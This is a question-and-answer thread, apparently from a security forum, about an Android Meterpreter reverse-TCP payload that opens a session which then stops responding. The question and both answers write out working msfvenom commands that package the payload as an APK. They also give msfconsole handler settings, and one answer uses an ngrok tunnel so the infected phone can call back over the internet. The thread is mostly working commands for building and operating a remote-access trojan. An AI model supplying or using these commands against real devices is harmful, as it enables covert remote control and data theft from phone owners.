# Metasploit opens Meterpreter, but the shell is unresponsive

Tags: android

I created a payload using

`msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk`
signed the apk, sent it to my phone, opened up `msfconsole` and ran

```
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit
```

After this, I installed the apk and opened it on my phone, and got something similar to this:

```
msf exploit(handler)  > [*] Sending stage (179267 bytes) to [target IP]

[*] Meterpreter session 1 opened  ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300
```

I can't use `sessions -i 1` (like [here](https://security.stackexchange.com/questions/169838/metasploit-opens-meterpreter-but-shows-no-prompt-please-help)) because when I type stuff in the console, pressing enter does nothing. I can open a new `msfconsole`, but it says there are no active sessions.

Answer (score 1):

You have to set **`LPORT`** in apk payload and in Metasploit to make a reverse connection.

**Example:**

```
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 R > ANDROID.apk
```

**In Metasploit:**

```
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set LPORT 4444
exploit
```

Comment: I have tried this, and I still get the same error.

Comment: Can you share the screenshot?

Answer (score 0):

If your phone and computer are not on the same network, you need to port forward to your modem. This is necessary to forward the incoming ip address from the modem to its own ip. You can also do this from the interface settings of the modem. [you can see it here](https://youtu.be/jfSLxs40sIw)

2 - you can use tunnel services e.g. [ngrok](https://ngrok.com/)

very simple to use

- open an account
- download for linux
- copy token
- open ngrok directory in terminal
- paste token
- `./ngrok tcp 4242`
- [tunnel opened](https://i.stack.imgur.com/n2o3j.png) (burayı kapatma)
- sample payloads `android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=11620 R > /root/FileName.apk`
  (lport opened tunnel will also be given to you)

then msfconsole settings

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4242
exploit -j -z
```